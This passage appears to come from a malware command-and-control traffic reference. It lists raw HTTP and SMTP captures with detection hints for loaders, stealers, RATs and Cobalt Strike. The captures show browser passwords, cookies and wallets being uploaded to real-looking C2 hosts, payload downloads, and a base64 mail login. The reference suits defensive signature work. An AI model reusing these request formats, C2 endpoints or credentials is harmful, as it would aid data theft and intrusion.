HTTP/1.1\nHost: 5.188.60.21\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nDate: Thu, 30 Jan 2020 01:53:02 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 56\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n\n\n1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 200 OK\nDate: Thu, 30 Jan 2020 01:53:02 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 56\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n\n1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 100 Continue\n\nPOST /gate.php?id=1&os=Windows%207&cookie=10&pswd=3&version=v1.0%20Beta&cc=0&autofill=2&hwid=90059C37132041A4B58D2B75A9850D2F HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------8d7a52725dea892\nHost: 5.188.60.21\nContent-Length: 60824\nExpect: 100-continue\n\n-----------------------8d7a52725dea892\nContent-Disposition: form-data; name=\"file\"; filename=\"381.zip\"\nContent-Type: application/octet-stream\n\nPK..........>P\\ZWW..........$.Browsers.txt\n. .........0.5.....0.5.....0.5.....s..\t-N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S..*8..).%5-.4.D.,.Y..a.B.y....._.......Y..._..P.....Z..).t....TV.....@........U....mA..@n:..#..d...PK..........>P~\n......L.....$.Domains.txt\n. .........0.5.....0.5.....0.5.....+//.......I../J..*G. ...PK..........>Pr.............$.Outlook.txt\n. ..........[:......[:......[:.......,.I..s.,I......PK..........>P^.]I........\n.$.Passwords.txt\n. .........0.5.....0.5.....0.5.......A.. .E.$....4...+S.q..+`.....0XOoMl....'...5.).s..8;b.Jpv....p8..MX.......\"......63'.>..{...\n. .........0.5.....................PK..-.........>P..............$........ ......CryptoWallets/\n. ..........[:......[:......[:.....PK...........\n........\n-----------------------8d7a52725dea892--\n\nHTTP/1.1 200 OK\nDate: Thu, 30 Jan 2020 01:53:05 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 56\nContent-Type: text/html; charset=UTF-8\n\n1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exe\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr1.png \"Borr\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr2.png \"Borr\")\n\n#### Brushaloader\n~~~\nPOST / HTTP/1.1\nAccept: */*\nUA-CPU: AMD64\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: patromink.xyz\nContent-Length: 47\nConnection: Keep-Alive\nCache-Control: no-cache\n\nk=6292&n=6292&m=6292&id=droniks34&m=6292&l=6292\n\nHTTP/1.1 200 OK\nServer: nginx/1.16.1\nDate: Thu, 31 Oct 2019 17:51:52 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: keep-alive\n\nThank You 22501\n~~~\n~~~\ntry {\"6f7074696f6e73ProcessorId\"; $disks = gwmi Win32_Volume -filter \"Name='C:\\\\'\";$disks.SerialNumber}catch{\"null\"}\n\n6f7074696f6e73ProcessorId 3300537927\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/brushaloader.png \"Brushaloader\")\n\n#### Buer Loader\n~~~\nGET /api/update/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ODM0MjIwNTc5ZGIzNGJiMTMzNWNlMmJlNDJmMjBhMTA5MTVjNWQxZThmN2U0OWJjYjY0ODVjODE4NjQwYjk3YzY0NWU5NjAxNGMxY2U3NWQ2MmI5N2MwY2QzNzlhMmQ2ZmM5ZDFjZjIwNWMwMTEwNWVkNDAyZjY0ZDYyMTg0Y2UyZmJhZmEyYTQxMzBhZWRiNmY0ZjI2ZjFjZmI4MTQwMTBiYzE0Y2Y4NjBiM2U2NGE1NTBhNTc0Y2M4 HTTP/1.1\nConnection: Keep-Alive\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\nHost: loood1.top\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 12 Nov 2019 20:00:24 GMT\nContent-Type: text/plain; charset=utf-8\nTransfer-Encoding: chunked\nConnection: keep-alive\n\nODMtMkQtNzItMUMtMEQtOTgtREEtOTAtMzktNjUtREYtNzYtRDktQkYtQkYtNUEtMDUtNEMtRjAtRkMtMjAtQzctMEUtQzMtRDAtODYtMzYtRTQtOTktMDAtN0YtRDAtNjQtNDctMzktMkYtRTktMTMtM0MtNDgtNjktNTQtNDEtMTktRjMtNUUtQTItNjgtQTUtMjQtNkEtNEItNzItQ0UtODUtRDQtMDAtQjctMTYtNEItOUItMDQtQzgtMTctN0UtRDgtQzctMDAtM0ItN0ItQzUtQTQtMTYtQUEtM0UtNEEtRjMtRUItNDUtQTctMEItMTctOTEtNUItNTQtNEEtODUtNzctNEEtQjUtRTYtMUMtNTktRDEtODctNDQtQkItMjAtNkQtNTgtQzEtMEEtNEItNEMtRTEtNTItM0MtRTItMkYtNTktOEUtMkUtRjItRDgtRjQtOTgtMUYtRjEtNTEtQzktMTUtNTAtQkEtNDktMkUtMzAtRDMtMjUtRDMtODctNEItQjYtRjUtN0MtMUUtMjQtRTktOTgtM0MtNTYtNjYtRTUtRDctQ0UtMDAtNUQtNkEtODUtMDEtQjEtMkMtQjctODUtMkQtMzItNjItNUEtM0UtRUQtMTYtMDYtMjYtMDYtRDMtOTYtMDMtOUEtOTEtN0MtMTUtOTEtRkYtQUItMDItQzItNzctRTItN0EtNDEtMEEtQjAtMzItOUEtMEYtRjQtMDMtNzAtMUYtMEItNTEtMDktM0EtNzQtQjEtODgtMzEtMUQtREEtQTItRjQtMzktNkUtMTctRDItRDktNTQtRDUtOEYtMDAtQkEtODEtNkUtNEUtMzUtQTMtNTItRkQtODctRTMtRDYtMkMtNTQtODctQTItNjYtQzgtM0MtMzgtQzctMEEtM0EtOUQtOEEtMzAtRTAtMDgtMzItMTAtMDgtRjItQjYtRkUtMUQtQzctQzgtQUUtOEYtNjctQUUtNTItMDUtQTktMTAtQUYtM0MtOEUtMTMtN0EtNzItM0YtMzAtRTktMzUtRDMtNTQtQkEtOEQtQzAtMzItQTctRkItNDUtQTMtNTctRTQtMUItMzAtODItNEYtOTEtOTktMUMtRDItRjgtMkEtMzYtRTItODktQjItQkItMUItNjYtQUMtMUItOEMtNjQtRUEtN0QtQkQtMkMtOTktQ0QtQzQtQkQtNzgtQzgtOUMtQjAtNkQtNTYtOEUtRDktREEtOTEtMEEtNkMtQUEtQTQtMUUtRTAtQ0MtMzMtRDMtMjAtRTItNjktMjktQzEtRTQtNjEtMTAtMjUtOTgtNjMtOEUtNTgtNzQtRjctNUEtNEYtNDktQzUtNjItNTEtNTAtNTgtNDktM0QtREQtNjctRDctNjEtMTAtMTktRkItNzUtODYtRUItMEYtQzMtRDMtQkQtMjctNkUtQzYtRDktQkYtQUUtNDAtOEEtMUEtMUQtNjctOEMtMjItNjctQjgtNUQtQzItMTUtREQtODMtNzgtNjctN0ItMTMtNDktNzMtRjMtRTAtNEYtMDUtRkYtQjktQ0ItMkEtMDctQkMtRTgtRTMtREQtMUMtNEEtQUQtQjItMTUtNUEtNDMtMTQtQUEtNDEtMUQtNzAtMUEtREQtNTQtMTYtOTAtNjctMTUtNjUtQTgtMjItMTUtMzgtRDYtNjgtOTQtNDMtNDQtQzgtNkQtMUYtNTAtNkMtMTgtMzMtQjUtNzAtOTQtMDQtNzMtRDMtNjQtMTktNDctNjYtNzgtOTEtQkUtQ0ItRTktREItNkQtODgtRkMtOTAtOTk=GET /api/download/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ZGU0Njc4MDI5MWU2NGJhNTYyMDhiMGI4MDlhNDBkNGQ5NjQ2NWQxYjgzNzYwNmIzYjQxZTViZDU4MDE3YjQyZjZmNTVjNg== HTTP/1.1\nConnection: Keep-Alive\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\nHost: loood1.top\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 12 Nov 2019 20:00:24 GMT\nContent-Type: application/*\nContent-Length: 2109952\nConnection: keep-alive\nLast-Modified: Tue, 12 Nov 2019 19:32:38 GMT\n\n.}.<,...XG.V.$.-. ..D.o...S..c].ng.\n.cH!.:2;.~.b..JkP...e.,k...7P.]....._0.&..p.U......=J........9?..J.@.\nj.^ .h....P.j.S5.q....\th..<.?*u@I^.|.......*..t..5Y.............3.:..v/.(....B.......w.\\.|.C............/9...^........F....({..U.{f.c...'......9..%.Z.rJ_.....f....q.#...~..}.....\n....k0#.o..............O\\....w@..>....E..F.@......4..{#k.hqpxy.....}|....-....B....\n~~~\n~~~\nPOST / HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3\nContent-Length: 1046\nHost: 162.244.81.87\n\ninekece=MDllNzB&diakwadi=iMzE5OG&xycyad=NiNTYxZTcw&ohxiods=MzA0Yj&akreuq=NmZjUy&qosewyic=MzRmMTk5M&amupawel=jdjZGViY&ydsohuu=jljNzMxZDc&orbemaaf=3ZDExMmEx&inhiadfa=ZjA3MG&kyzeafu=UyYzc0M2&alnaexu=M3NGZj&idsavu=Y2VjM2RhO&nyxyygre=GY3YmR&tuxynool=hMmU3Yzc1O&myweka=DNkMDAwYWF&qeozoszi=kOGRlZD&dygyliaz=diNmZkNW&ykdovy=ZiYmVhY&yvabqua=zA4NWEzN&ugsoetl=2Y3ZDk&wymioxi=xNzIwMTIy&uqafsee=Njg1ZTYwNG&cyyqsady=M3NmQwZj&ykuweddy=hkYTQ5ZTV&emlazebe=hYzc5MGVkZ&imirdaby=mJiMzU&doyvku=wYzRhNzQ&roniym=0YTQ5ZDBi&qyaxwe=MTlmZW&uteqop=NkZjdkN2Z&noylke=lNTg5OGJmM&dedynu=DEzNjgxM&suutyfwu=DBkMjFiYm&riitoked=M3NmJjMDg&waliaw=2ZjNhNW&qiubulo=EzZGU2Zm&urehuz=UxNzhjZj&guizpuat=kzYjMzMz&ziapluc=IzODIyYT&orygybib=Y2OGUwY&ebilxufo=2RmYzllM&wesekuy=DVlZThmYTQ&buapxa=3MGVmZDM&lisoxu=xNTlkZ&usgager=TBmOTc4ZDY&cuehlumy=0ZTA5OTZlO&raxyuh=DE2MTA0YWN&piuluwyc=iYjQ4NjE0&gybetez=MzQ3ZW&isvazugo=NhZDExZGEz&obalozha=YmJjZDQ4&pivoewta=NzljOTI&dakiva=xMTE4ND&luzaih=A4OGEz&sesyaci=Mzk0ZWE1YT&opheteow=AxNjQwN&ebzyluo=zBkZWYy&osfiuk=ODc2&yzxaob=NDVmMTViNjdkZDli&exmuur=suirufy\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer.png \"Buer Loader\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer2.png \"Buer Loader\")\n\n#### Cannibal RAT (aka Ares)\n~~~\nPOST /api/admin_90520735581359/hello HTTP/1.1\nHost: 35.192.197.199:8080\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.18.4\nContent-Length: 69\nContent-Type: application/json\n\n{\"username\": \"admin\", \"platform\": \"Windows 7\", \"hostname\": \"User-PC\"}\n~~~\n~~~\nPOST /api/admin_90520735581359/report HTTP/1.1\nHost: 35.192.197.199:8080\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.18.4\nContent-Length: 26301\nContent-Type: application/x-www-form-urlencoded\n\noutput=%24+%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22%0A++%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%0A%3Chtml%3E%0A++%3Chead%3E%0A++++%3Ctitle%3ETypeError%3A+unsupported+operand+type%28s%29+for+%2B%3A+%27NoneType%27+and+%27str%27+%2F%2F+Werkzeug+Debugger%3C%2Ftitle%3E%0A++++%3Clink+rel%3D%22stylesheet%22+href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dstyle.css%22%0A++++++++type%3D%22text%2Fcss%22%3E%0A++++%3C%21--+We+need+to+make+sure+this+has+a+favicon+so+that+the+debugger+does%0A+++++++++not+by+accident+trigger+a+request+to+%2Ffavicon.ico+which+might%0A+++++++++change+the+application+state.+--%3E%0A++++%3Clink+rel%3D%22shortcut+icon%22%0A++++++++href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dconsole.png%22%3E%0A+++\n\nHTTP/1.0 200 OK\nContent-Type: text/html; charset=utf-8\nContent-Length: 0\nServer: Ares\nDate: Thu, 21 Nov 2019 22:54:05 GMT\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cannibal.png \"Cannibal RAT\")\n\n#### Coala Bot\nUses fake 404\n~~~\nPOST /jjj888/skghn.php HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/12.0.1576.62 Safari/537.26\nContent-Type: application/x-www-form-urlencoded\nHost: 185.170.43.187\nContent-Length: 120\nExpect: 100-continue\nConnection: Close\n\nHTTP/1.1 100 Continue\n\nJk1pY3Jvc29mdCBXaW5kb3dzIDcgUHJvZmVzc2lvbmFsIHgzMiZhZG1pbiY4NjNCLUJFQUItOEZDNi0yMEJGLTlDMDktMkY1NS01OEUxLUExRDYmRmFsc2U(\n \nHTTP/1.0 404 Not Found\nDate: Tue, 15 Jan 2019 13:20:17 GMT\nServer: Apache/2.4.10 (Debian)\nSet-Cookie: PHPSESSID=euhbs94osbalc0ubsfl5c2v324; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Length: 88\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nMTAzNDE2MzR0MTdoYWhkQkZ1amRmYnd1cmhmbmllZmhydWZoYm5maGdmeVREZmJHRlZ5V2d2ZnwxNTQ3NTU4NDE3\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/coala.png \"Coala Bot\")\n\n#### Cobaltstrike\n~~~\nGET /Mdt7 HTTP/1.1\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; NP06)\nHost: 198.199.89.56\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Wed, 16 Oct 2019 00:03:32 GMT\nContent-Type: application/octet-stream\nContent-Length: 213589\n\n.......\nw.z....=..........C.D.'.'Z.2....:1....R..1...1.......1.9.t...^.......3.Q.3.R.~...~..........6a..6a-L^.............................................`.....W...?...O...=...^...1...T...:.......:..._...U...U...U.v.......v......,9\n.W.E.3k..a....9..l.T..k...........J......;J.._.k...$......J....h...'..qD\n\nGET /push HTTP/1.1\nAccept: */*\nCookie: TwJl1o2Nzk3+xmC39FsNTbyJPGHyNxllFZ8wZUwR831SYmTwrxoGydXQGF1ej89K1t0rTLgzjd95c8127hlZ6SQ4hx95YrYuRHooitXYGEAxtbKv53LJ6K+6r1y1OQU3n0+O93xxPiyx6RvPeKzlACbO4nEc5YKzh0vAfWJvlm0=\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)\nHost: 198.199.89.56\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Wed, 16 Oct 2019 00:05:35 GMT\nContent-Type: application/octet-stream\nContent-Length: 0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltstrike.png \"Cobaltstrike\")\n\nAmazon c2 profile\n~~~\nGET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1\nHost: www.amazon.com\nAccept: */*\nCookie: skin=noskin;session-token=MM4bZQ5WUPUrn7TPQuCWct6G+WGXZaLdezMQVEv8PHnB7tnvTk7ct3W71pQmn2NMJQD7IFbjPnKJV27tKshA8AjgzpXoeUtOIrDiBEg0x3AesYq52s74IbjnsVA+wASo0D6L23fd87XNDUiBro5wNBzcybUOADAO1fjCobw5MAw=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Fri, 13 Dec 2019 17:48:39 GMT\nServer: Server\nx-amz-id-1: THKUYEZKCKPGY5T42PZT\nx-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=\nX-Frame-Options: SAMEORIGIN\nContent-Encoding: gzip\nContent-Length: 0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltamazon.png \"Cobaltstrike\")\n\nSafebrowsing c2 profile\n~~~\nGET /safebrowsing/ref/eNKSXUTdWXGYAMHYg2df0Ev1wVrA7yp0T-WrSHSB53oha HTTP/1.1\nAccept-Language: en-US\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Encoding: gzip\nHost: novote.azureedge.net\nCookie: PREF=ID=foemmgjicmcnhjlacgackacadbclcmnfoeaeeignjhiphdgidlmahkgbchcahclpfcadjnegckejpiofbmllpnaeancgbikcdjohkekapgnkgiijobnknkgiahmkcjipnncehcamnopcmlngcboppjdplhhobhgekdcblgpkdggeklenpcabdkhhhaedogkacljhdgdphfanfbmcbnkgjmplhdkomllhnnoppchchejooiplahpgpmfaegdcpbnd\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nContent-Encoding: gzip\nAge: 1609\nAlternate-Protocol: 80:quic\nCache-Control: public,max-age=172800\nContent-Type: application/vnd.google.safebrowsing-chunk\nDate: Fri, 22 Nov 2019 13:34:50 GMT\nServer: ECAcc (frb/67BC)\nX-Content-Type-Options: nosniff\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Length: 82480\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobalt-safe.png \"Cobaltstrike safebrowsing\")\n\n#### Cobian RAT\n~~~\n...........................LOGIN|-|ROOT02_392170|-|JONATHAN-PC@Jonathan|-|Microsoft Windows 7 Professional |-|No|-|1.0.20.0 [Black]|-|Program Manager|-|ROOT02_392170,goodattack.duckdns.org,4007,svchost.exe,{VYFGJQ0V-30663-BEMNQX-BEMNQX0BNF},TEMP,False,False,|-|.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobian.png \"Cobian RAT\")\n\n#### Collector Project\n~~~\nGET /get_data.php?info HTTP/1.1\nUser-Agent: CLCTR\nHost: u667503gif.ha004.t.justns.ru\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\nContent-Length: 66\nDate: Fri, 24 Apr 2020 16:45:45 GMT\nServer: LiteSpeed\nVary: User-Agent\n\nIP-address: 85.203.44.133_=_Country: Netherlands_=_City: Amsterdam\n\n\nPOST /get_data.php?id=1874255356&cc=0&pc=1&hash=8f41bab4341b7ac42eb623fad118f430 HTTP/1.1\nContent-Type: multipart/form-data; boundary=SendFileZIPBoundary\nUser-Agent: uploader\nHost: u667503gif.ha004.t.justns.ru\nContent-Length: 1191921\nConnection: Keep-Alive\nCache-Control: no-cache\n\n--SendFileZIPBoundary\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"zipfile.zip\"\nContent-Type: application/zip\n\nPK...........P.w..B*..........Screenshot.pngUT\n...%.^.%.^.%.^$.uXS........n.\t.......P........!.H...}. *9JB....5:Fm0.........:;...9.....W,...!=\n.O_c.).c.....y>...k...?u...n.5..........k...../...#*.........pt]3.n\\g...?PK...........P....I...........Browsers/passwords.txtUT\n...%.^.%.^.%.^.\n..R.())(.....KKLNM....K.......O.......V:.....y........R...@..../W<.....PK...........P\n...7...........Browsers/AutoFill.txtUT\n...%.^.%.^.%.^.K.M.Rp.,*...2y...sJ.\"..IE..9.\\...^.?..>.hF.%..e...Sd6.PK...........P................Browsers/!browsersInfo.txtUT\n...%.^.%.^.%.^.............\\.c..)....v..\t-N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...b.tu.....K.J...cy.x...;.........\t.........Cc...&a...Q^\nru..qv$&F.PK...........P..m. ...}.......information.txtUT\n...%.^.%.^.%.^-.Oo.0......|..D4.?.\nu 6UP.\"....x..6U.`.../..|...Y/q...UV.J(..g ...8.r.....!.k.`.Y.)$s.NC........{.+..$.2c.......&..*........Q.U..l....&..^+M_Jk..~..?......D}pd]..Qm...w.X.........6...OW.s6c\t..\n/.`..w..U9*..?..o.}.Q..1|Ver-3.1||||C:\\ProgramData\\Dhrolas\\|subdomain.....getavs=avpro.....subdomain-getavs=@....264>smss>0><352>explorer>0><796>svchost>0><348>csrss>0><1232>svchost>0><608>svchost>0><3720>windanr>0><692>svchost>0><708>ctfmon>0><864>svchost>0><1872>SearchIndexer>0><3520>SearchFilterHost>0><1384>IMEDICTUPDATE>0><404>csrss>0><1204>spoolsv>0><3484>SearchProtocolHost>0><1824>svchost>0><396>wininit>0><840>svchost>0><1460>qemu-ga>0><2704>audiodg>0><1000>svchost>0><1944>886c394c284f3f334c0e385fe36ec1022037585810b9e39629fcbdc2ac4d27e1>0><464>lsm>0><552>winlogon>0><1352>svchost>0><280>dwm>0><1080>svchost>0><456>lsass>0><4>System>0><448>services>0><2032>taskeng>0><0>Idle>0><\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/crimson.png \"Crimson RAT\")\n\n#### Cryptbot\n~~~\nPOST /index.php HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------------j3v66jdmskc244S\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\nHost: saas01.pro\nContent-Length: 50253\nCache-Control: no-cache\n\n-----------------------------j3v66jdmskc244S\nContent-Disposition: form-data; name=\"file\"; filename=\"C:\\ProgramData\\AaZ2SXQu2BSEGVOA\\SS5KbUwQhOLk.zip\"\nContent-Type: application/octet-stream\n\nPK.........S_O\\...........4...Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT\n.....]...]...]..KO.@......SZ...hg.\t..!<..n.<..P.....^.n.....|....7.W}:..=..e.....4Yl..S.\\I..n...z......C..G.....F.,O....*..]gg........<.t>.=.......fY..ce2...Uo..t...6..$!.$...q<.\n..y.KF. p.h$.$..V.Ht\".,../.-K.'T..p..B[c........?...&.S..\"...b.J.T......(...!B.E1...D\\!*N.!....PK.........S_O..K.............Browsers/_FileCookies.txtUT\n.....]...]...]..KO.@.......t.....%&H\"...J.!3S.0.60......;......ht.\\x.}5.....b/...=...|3a.\n.Zi.v...0...pj....=.]..<...........D...g=o.5..!..}...M..k..s......Y1,7........&.s. ....W.G..yn*F.$...$...wN.LL.J,%.(.-K}A.......q..h.J....?T.M...'.L)!\".JK...p7..?.A!o...Ql8l....Z...0.}.PK.........S_OFq..O...h.......Browsers/_FileForms.txtUT\n.....]...]...].K.M.Rp.,*...2...j.8,1..(...T.......V...MQPbJQfz~1/./.SQ~yqj...o~UfNN\".....\n^..PK.........S_OE.%.{...........Browsers/_FilePasswords.txtUT\n.....PA..N6.....).......a.?.C.........g.|......kiQ......^..\"./.......:.R.y...7...]}.45.{.D..S]......d*nY.q!.3........P.R.C.....G.B\t.\"...;.o.5....iU.;....$}._..&...e@...wF..PK...........S_O\\...........4.\t....... .......Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT......]PK...........S_O..K...........\t....... ...g...Browsers/_FileCookies.txtUT......]PK...........S_OFq..O...h.....\t....... .......Browsers/_FileForms.txtUT......]PK...........S_OE.%.{.........\t....... ...I...Browsers/_FilePasswords.txtUT......]PK...........S_OE.%.{.........\t....... ......._FilePasswords.txtUT......]PK...........S_O.....\t..Fk..\t.\t....... ......._Info.txtUT......]PK...........S_O..=mK.........\t....... ......._Screen.jpgUT......]PK..........&.........\n-----------------------------j3v66jdmskc244S--\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Thu, 31 Oct 2019 10:30:07 GMT\nContent-Length: 3\nConnection: keep-alive\nX-Powered-By: Express\n\nok!\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cryptbot.png \"Cryptbot\")\n\n#### Danabot\nNot real TLS traffic, flag on \"24 01 00 00\" pattern and 24 byte first packet \n~~~\n00000000 24 01 00 00 00 00 00 00 e5 7c 00 00 00 00 00 00 $....... .|......\n00000010 09 7e 00 00 00 00 00 00 .~...... \n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/danabot.png \"Danabot\")\n\n#### Darkcloud-fg\n~~~\n220-sg2plzcpnl456444.prod.sin2.secureserver.net ESMTP Exim 4.95 #2 Mon, 06 Feb 2023 08:00:59 -0700 \n220-We do not authorize the use of this system to transport unsolicited, \n220 and/or bulk e-mail.\nEHLO DESKTOPJGLLJLD\n250-sg2plzcpnl456444.prod.sin2.secureserver.net Hello DESKTOPJGLLJLD [45.86.200.53]\n250-SIZE 52428800\n250-8BITMIME\n250-PIPELINING\n250-PIPE_CONNECT\n250-AUTH PLAIN LOGIN\n250-STARTTLS\n250 HELP\nAUTH LOGIN\n334 VXNlcm5hbWU6\naW5mb0BrcmlvbmNvbXB1dGVyLmNvbQ==\n334 UGFzc3dvcmQ6\ncWhyVlNDSyYm\n235 Authentication succeeded\nMAIL FROM: \n250 OK\nRCPT TO: \n250 Accepted\nDATA\n354 Enter message, ending with \".\" on a line by itself\nthread-index: Adk6O9KSWRF117oSS/+EnKkCJKo7kA==\nThread-Topic: DC-FG:::DESKTOP-JGLLJLD\\admin\\45.86.200.110\nFrom: \nTo: \nSubject: DC-FG:::DESKTOP-JGLLJLD\\admin\\45.86.200.110\nDate: Mon, 6 Feb 2023 15:00:59 -0000\nMessage-ID: <4A2332A508DC4B61B8ACDBC8A9CD1E68@DESKTOPJGLLJLD>\nMIME-Version: 1.0\nContent-Type: multipart/mixed;\n\tboundary=\"----=_NextPart_000_0000_01D93A3B.D2A2B3E0\"\nX-Mailer: Microsoft CDO for Windows 2000\nContent-Class: urn:content-classes:message\nImportance: normal\nPriority: normal\nX-MimeOLE: Produced By Microsoft MimeOLE\n\nThis is a multi-part message in MIME format.\n\n------=_NextPart_000_0000_01D93A3B.D2A2B3E0\nContent-Type: text/plain\nContent-Transfer-Encoding: 7bit\n\n\n------=_NextPart_000_0000_01D93A3B.D2A2B3E0\nContent-Type: application/x-zip-compressed;\n\tname=\"Files.zip\"\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment;\n\tfilename=\"Files.zip\"\n\nUEsDBBQAAAAIANaRa090OBjdswQAADkMAAAZAAAARmlsZXMvYXV0aG9yZ2FsbGVyaWVzLnJ0Zq1W\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcloud-fg.png \"Darkcloud-fg\")\n\n#### 